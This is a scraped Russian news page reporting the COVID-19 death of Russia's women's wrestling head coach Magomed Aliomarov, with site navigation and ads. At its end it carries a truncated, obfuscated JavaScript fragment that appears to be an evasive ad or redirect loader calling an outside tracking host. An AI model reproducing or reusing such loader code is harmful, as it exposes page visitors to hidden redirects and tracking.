«Да, это коронавирус»: в России умер главный тренер сборной по вольной борьбе

Магомеду Алиомарову было 67 лет. Последние дни он был подключен к аппарату искусственной вентиляции легких

В среду, 13 мая, в Махачкале на 68-м году жизни скончался главный тренер сборной России по женской борьбе Магомед Алиомаров. Последние дни жизни он находился в больнице и был подключен к аппарату искусственной вентиляции легких. В руководстве Федерации спортивной борьбы России подтвердили, что причиной смерти стал коронавирус. Ранее мы сообщали, что известный украинский тренер умер за рулем автомобиля.

«К сожалению, это суровая действительность, Магомед Алиомарович Алиомаров умер сегодня ночью в Дагестане. Да, это коронавирус, – заявил президент Федерации спортивной борьбы России Михаил Мамиашвили. – Похороны состоятся сегодня в Дагестане. Сказать, что это очень большая потеря для нас, значит ничего не сказать. Магомед Алиомаров был еще молодым мужчиной, и у него было столько энергии, столько планов, столько надежд. И те революционные преобразования, которые он сделал в женской борьбе, конечно же, вселяли в нас надежды. Но это все настолько несравнимо с тем, что ушел из жизни такой молодой человек, у которого есть семья, дети, внуки"

	"Да, это коронавирус": в России умер главный тренер сборной по вольной борьбе

Читайте также: Трагическая случайность: футболист умер от удара током, запуская воздушного змея

Реклама

По последним данным, в России официально зафиксировано 232 243 случая заражения коронавирусом. Из них2 116 оказались летальными.

Все подробности в спецтеме Коронавирус

Подпишись на наш telegram

Только самое важное и интересное

Подписаться

Реклама

Россия
умер
коронавирус
вольная борьба
Магомед Алиомаров

Источники:

Сегодня|Спорт
,
Р-спорт

Следите за нами в соцсетях

Подписывайтесь на нашу рассылку

Введите корректный email

Ок

Реклама

Новости партнеров

Загрузка…

Популярные статьи

	"Да, это коронавирус": в России умер главный тренер сборной по вольной борьбеКарантин со звездой спорта: пеките хачапури и оставайтесь стройными – секреты чемпионки мира по борьбеДругие 	"Да, это коронавирус": в России умер главный тренер сборной по вольной борьбеУсик показал мальчишкам движения волка, а Шелестюк засветил свой алкоголь: карантин звезд спортаБокс 	"Да, это коронавирус": в России умер главный тренер сборной по вольной борьбе«Думал, что будем драться без правил»: борец-«эксперт» передал еще одно сообщение боксеру УсикуБокс 	"Да, это коронавирус": в России умер главный тренер сборной по вольной борьбе«Вот это свобода!»: словацкая спортсменка разделась догола, взобравшись на высоту 1402 метраДругие 	"Да, это коронавирус": в России умер главный тренер сборной по вольной борьбеДочь Олега Блохина поздравила работающих мам невероятно забавным видео со своей малышкойДругие 	"Да, это коронавирус": в России умер главный тренер сборной по вольной борьбеСамые красивые ноги Румынии: именинница дня – олимпийская чемпионка, которая ушла на пенсию в 18 летДругие

Новости партнеров

Загрузка…

загрузка…

	"Да, это коронавирус": в России умер главный тренер сборной по вольной борьбе

Наши соцсети

  • Facebook

  • Telegram

  • Youtube

  • Instagram

Связаться с нами

  • Контакты редакции

  • Написать нам

  • Реклама на сайте

  • Спецпроекты

  • Архив сайта

Политика сайта

  • Правила цитирования

  • Правила комментирования

  • Конфиденциальность и защита персональных данных

Стоковые фотографии от

© segodnya.ua, 2020

Главное

Лента новостей

Отсутствует подключение к сети Интернет
.
.
.
.

if(document.documentElement.clientWidth > 1199) {
(function(){(function(l,d,A){«use strict»;var t,o,e,i,z,r,n,S,T,a,c,f,s,p,h,u,b,D,k,v,g,x,m,E,y,M,C,O,L,N,w,_,H,I,R,q,P,$,j,F,J=300,W=»/z»,X=»0x04″,B=»http»,G=»substr»,K=»host»,Q=J,U=»argon_»+»debug»+»=1″,V=»prototype»,Y=»createElement»,Z=»appendChild»,tt=»setTimeout»,ot=»querySelectorAll»,et=»getOwnPropertyDescriptor»,rt=»Object»,nt=»charCodeAt»,it=»fromCharCode»,at=»zmctrack»+».net»,ct=»bind»,ft=»call»,lt=»script»,dt=»head»,st=»get»,pt=»set»,ht=»indexOf»,ut=»s.»+at,bt=»cookie»,kt=»XMLHttpRequest»,vt=»Date»,gt=»now»,xt=»responseText»,mt=»open»,yt=»ShadowRoot»,wt=»Node»,At=»send»,zt=»Array»,St=»addEventListener»,Tt=B+»://»+»click»+».»+at+»/c/»+»redirect»+»?»+»hash»+»=»,Dt=»slot»,Et=»Math»,Mt=»floor»,Ct=»random»,Ot=»console»,Lt=»Document»,Nt=»innerHTML»,_t=»attachShadow»,Ht=»offsetWidth»,It=»Element»,Rt=»next»,qt=»previous»,Pt=»push»,$t=»length»,jt=»shift»,Ft=»parentNode»,Jt=»textContent»,Wt=»JSON»,Xt=»parse»,Bt=»load»,Gt=»HTML»+It,Kt=»error»,Qt=»location»,Ut=»href»,Vt=»POST»,Yt=»document»,Zt=»un»+»eval»,to={},oo=»parseInt»,eo=It+»Sibling»,ro=»String»,no=»split»;to[«mode»]=»closed»,t=l[Yt],o=l[«chrome»],e=!0,i=0;try{e=!!l[Zt]}catch(t){}function io(t,o){return q[ft](t,o||»|»)}!o&&!e||(z=l[«n10091125»],r=z[Yt],n=z[rt][et],S=r[ot][ct](t),T=z[tt][ct](l),a=n(z[Lt][V],dt)[st][ft](t),c=r[Y][ct](t),f=r[dt][Z][ct](a),s=z[vt][gt],p=-1Q?i++

По материалам: Сегодня

0 Replies to “«Да, это коронавирус»: в России умер главный тренер сборной по вольной борьбе”